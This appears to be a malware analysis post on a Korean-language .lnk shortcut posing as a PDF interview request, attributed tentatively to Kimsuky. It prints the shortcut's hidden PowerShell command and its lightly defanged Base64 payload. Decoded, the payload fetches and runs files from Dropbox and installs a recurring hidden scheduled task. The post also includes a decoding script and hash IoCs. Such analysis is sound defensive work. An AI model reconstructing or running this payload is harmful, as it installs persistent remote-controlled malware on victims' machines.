Malware made by North Korea's Kimsuky: KxS 북한 수해 인터뷰 요청서(대문?아카데미 이?열 이사장님).lnk (2025.4.5)
Today we look at KxS 북한 수해 인터뷰 요청서(대문?아카데미 이?열 이사장님).lnk (2025.4.5) (roughly: "KxS North Korea flood-damage interview request form (to Chairman Lee ?-yeol of Daemun? Academy)"), a piece of malware made by North Korea's Kimsuky. To be clear, the attribution to Kimsuky is presumed, not confirmed.
Hashes
File name: KxS 북한 수해 인터뷰 요청서(대문?아카데미 이?열 이사장님).lnk
Size: 1 MB
MD5: 89bca3a895fc2c0b5e975372675f0049
SHA-1: 169aa69557f591296388c6abe81e6ed7e559c6ed
SHA-256: 6262c5ef438992966eda78d6d58e631592c4b78d09b6dd35fea3b6cdd46ac8d9
I do not know exactly what this organization is, but it professes Christian social engagement, dialogue between church and society, and humanization to overcome the alienation of people in today's society. Why it was targeted is unclear, but let's analyze the malware.
Malware code
StringData
{
namestring: Type: PDF File
Size: 358 KB
Date modified: 04/20/2024 11:23
relativepath: not present
workingdir: not present
commandlinearguments:
-windowstyle hidden -nop -NoProf(i)le -NonI(n)teractive -ExecutionPolicy Bypass -c "$
ss=\"JGhoaCA9IEpvaW4(t)UGF0aCAoW1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKSkgIktCUyDrto
HtlZwg7IiY7ZW0IOyduO2EsOu3sCDsmpTssq3shJ(w)o64yA66y47ZmU7JWE7Lm0642w66+4IOydtOyCvOyXt
CDsnbTsgqzsnqXri5gpLmRvY3giOyB3Z2V0(I)C1VcmkgImh0dHBzOi8vZGwuZ(H)JvcGJveHVzZXJjb250ZW50LmN
vbS9zY2wvZmkvYWlreDZrb3A4MDNsZnY5dWg4MWx0L3Rlc3QuZ(G)9jeD9ybGtleT1kejV5anNoMmk5dnJvOTFzeDY
zZDAxamE0JnN0PWo4Ymltb2NqJmRsPTAiIC1PdXRGaWxlICRoaGg7ICYgJGhoaDsgJHBw(c)CA9IEpvaW4tUGF0aCA
oJGVudjpBcHBEYXRhKSAiT3BlcmFVcGRhdGUucHMxIjsgJHN0ciA9ICckYWFhID0gSm9pbi1QYXRoICg(k)ZW52OkF
wcERhdGEpICJ0ZW1wMDc0ODYzNDg4OS5wczEiOyB3Z2V0IC1VcmkgImh0dHBzOi8vZGwuZHJvcGJveHVzZXJjb250Z
W50LmN(v)bS9zY2wvZmkvaW5kdTZ5dndodnVubm9qY2ZxcDhjL2FwcGxlLWt5LnR4dD9ybGtleT1xdXd6N3g4aThwc
nZzOGw1YW9oM25qNGprJn(N)0PWhtaDIxb2JiJmRsPTAiIC1PdXRGaWxlICRhYWE7ICYgJGFhYTsgUmVtb3ZlLUl0Z
W0gLVBhdGggJGFhYSAtRm9yY2U7JzsgJHN0c(i)B8IE91dC1GaWxlIC1GaWxlUGF0aCAkcHBwIC1FbmNvZGluZyBVV
EY4OyAkYWN0aW9uID0gTmV3LVNjaGVkdWxlZFRhc2tBY3Rpb24g(L)UV4ZWN1dGUgJ1Bvd2VyU2hlbGwuZXhlJyAtQ
XJndW1lbnQgJy1XaW5kb3dTdHlsZSBIaWRkZW4gLW5vcCAgLU5v(b)kludGVyYWN0aXZlIC1Ob1Byb2ZpbGUgLUV4Z
WN1dGlvblBvbGljeSBCeXBhc3MgLUNvbW1hbmQgIiYgeyRhYmMgPSBKb2luLVBhdGg(g)KCRlbnY6QXBwRGF0YSkgX
CJPcGVyYVVwZGF0ZS5wczFcIjsgJiAkYWJjO30iJzsgJHRyaWdnZXIgPSBOZXctU2NoZWR1bGVkVGFza1(R)yaWdnZ
XIgLU9uY2UgLUF0IChHZXQtRGF0ZSkuQWRkTWludXRlcyg1KSAtUmVwZXRpdGlvbkludGVydmFsIChOZXctVGltZVN
wYW4gL(U)1pbnV0ZXMgMzApOyAkc2V0dGluZ3MgPSBOZXctU2NoZWR1bGVkVGFza1NldHRpbmdzU2V0IC1IaWRkZW4
7IFJlZ2lzdGVyLVNjaGVk(d)WxlZFRhc2sgLVRhc2tOYW1lICJPcGVyYVVwZGF0ZSAyMi0xNTQ1NDM0Mi03LjI4IiA
tQWN0aW9uICRhY3Rpb24gLVRyaWdnZXIgJHR(y)aWdnZXIgLVNldHRpbmdzICRzZXR0aW5nczsgICRhYWEgPSBKb2luLVBhdGggKCRlbnY6QXBwRGF0YSkgImJvYXJkX2ZpcnN0LnBzM(S)I7IHdnZXQgLVVyaSAiaHR0cHM6Ly9kbC5kcm9wYm94dXNlcmNvbnRlbnQuY29tL3NjbC9maS80cTFtc3pqdmwzeXF5NHI1MHA4Yzcv(Y)XBwbGUtbHVjLnR4dD9ybGtleT1qd3o2dWFqbW1qZTJ5d3c3a2Y4ZmVvM2R6JnN0PWF3ODlheTN0JmRsPTA(i)IC1PdXRGaWxlICRhYWE(7)ICYgJGFhYTsgUmVtb3ZlLUl0ZW0gLVBhdGggJGFhYSAtRm9yY2U7DQoNCg==\"; $aa = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($ss));$cc = $env:appdata;$dd = \"user(.)ps1\";$ee = Join-Path $cc $dd;$aa | Out-File -FilePath $ee; $aaaaa= 89897878; & $ee; Remove-Item -Path $ee -Force;"
iconlocation: %ProgramFiles%\\Windows NT\\Accessories\\wordpad(.)exe
Code analysis
First, we can see that the shortcut is disguised as a PDF and that its payload is Base64-encoded.
To work out the exact structure, decode the Base64 with CyberChef.
That yields the following result:
$hhh = Join-Path ([System.IO.Path]::GetTempPath()) "KxS 북한 수해 인터뷰 요청서(대문x아카데미 이x열 이사장님).docx"; wget -Uri
"hxxps://dl(.)dropboxusercontent(.)com/scl/fi/aikx6kop803lfv9uh81lt/test(.)docx?rlkey=dz5yjsh2i9vro91sx63d01(j)a4&st=j8bimocj&dl=0" -OutFile …
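The decoding step above can be scripted instead of pasted into CyberChef. The following is an added example, not the author's workflow or the sample's code: it refangs a defanged commandlinearguments dump (the "(t)"-style insertions in the Base64 and "(.)" in domains), extracts and decodes the $ss blob, and reports the behaviours the decoded stage exhibits (download URL, file dropped under %AppData%, Register-ScheduledTask persistence, hidden window, self-deletion). The stage-two script, its URL (example.invalid) and the task name are constructed placeholders shaped like the page's decoded script, not the sample's real indicators.

```python
"""Decode and triage the LNK's PowerShell one-liner (added example, not the author's
CyberChef workflow). The LNK runs with -nop -ExecutionPolicy Bypass and carries a
$ss="..." base64 blob that FromBase64String turns into a .ps1 under %AppData%."""
import base64
import re
# Constructed stage two shaped like the page's decoded script (decoy .docx to %TEMP%,
# download, hidden scheduled task, self-delete); URL and names are placeholders.
STAGE2 = (
    '$hhh = Join-Path ([System.IO.Path]::GetTempPath()) "decoy.docx"; '
    'wget -Uri "https://example.invalid/decoy.docx" -OutFile $hhh; & $hhh; '
    '$ppp = Join-Path ($env:AppData) "ExampleUpdate.ps1"; '
    "$action = New-ScheduledTaskAction -Execute 'PowerShell.exe' -Argument "
    "'-WindowStyle Hidden -nop -ExecutionPolicy Bypass -Command \"& (Join-Path $env:AppData ExampleUpdate.ps1)\"'; "
    '$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(5) -RepetitionInterval (New-TimeSpan -Minutes 30); '
    'Register-ScheduledTask -TaskName "ExampleUpdate 1-0" -Action $action -Trigger $trigger; '
    'Remove-Item -Path $ppp -Force;'
)

def build_defanged_cmdline(stage2: str) -> str:
    """Wrap stage2 in the LNK's outer one-liner and defang one base64 char as the dump does."""
    b64 = base64.b64encode(stage2.encode("utf-8")).decode("ascii")
    b64 = b64[:20] + "(" + b64[20] + ")" + b64[21:]  # mimics e.g. IEpvaW4(t)UGF0aCA
    return ('-windowstyle hidden -nop -NoProfile -ExecutionPolicy Bypass -c "$ss=\\"' + b64
            + '\\"; $aa = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($ss));'
            ' $ee = Join-Path $env:appdata \\"user(.)ps1\\"; $aa | Out-File -FilePath $ee; & $ee;"')

def refang(text: str) -> str:
    """Undo single-character defanging such as (.) in domains or (t) inside base64."""
    return re.sub(r"\((.)\)", r"\1", text)

def decode_stage2(cmdline: str) -> str:
    """Extract the $ss="..." blob (tolerating the dump's line break after '$') and decode it."""
    m = re.search(r'\$\s*ss=\\?"([A-Za-z0-9+/=()]+)\\?"', cmdline)
    if not m:
        raise ValueError("no $ss base64 blob found")
    return base64.b64decode(refang(m.group(1))).decode("utf-8")

def triage(script: str) -> dict:
    """Report download URLs, dropped files, persistence, hidden execution and self-deletion."""
    return {
        "urls": re.findall(r'https?://[^\s"\']+', script),
        "drops": re.findall(r'Join-Path \(\$env:AppData\) "([^"]+)"', script),
        "persistence": "Register-ScheduledTask" in script,
        "task_names": re.findall(r'-TaskName "([^"]+)"', script),
        "hidden_window": bool(re.search(r"-WindowStyle Hidden", script, re.I)),
        "self_delete": bool(re.search(r"Remove-Item .*-Force", script)),
    }

if __name__ == "__main__":
    print(triage(decode_stage2(build_defanged_cmdline(STAGE2))))
```

For the real sample, pass the commandlinearguments text from the dump straight to decode_stage2; refang also strips the "(.)" from hosts such as dl(.)dropboxusercontent(.)com before they are compared against proxy logs.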
IoC
SHA-1: 169aa69557f591296388c6abe81e6ed7e559c6ed
MD5: 89bca3a895fc2c0b5e975372675f0049
SHA-256: 6262c5ef438992966eda78d6d58e631592c4b78d09b6dd35fea3b6cdd46ac8d9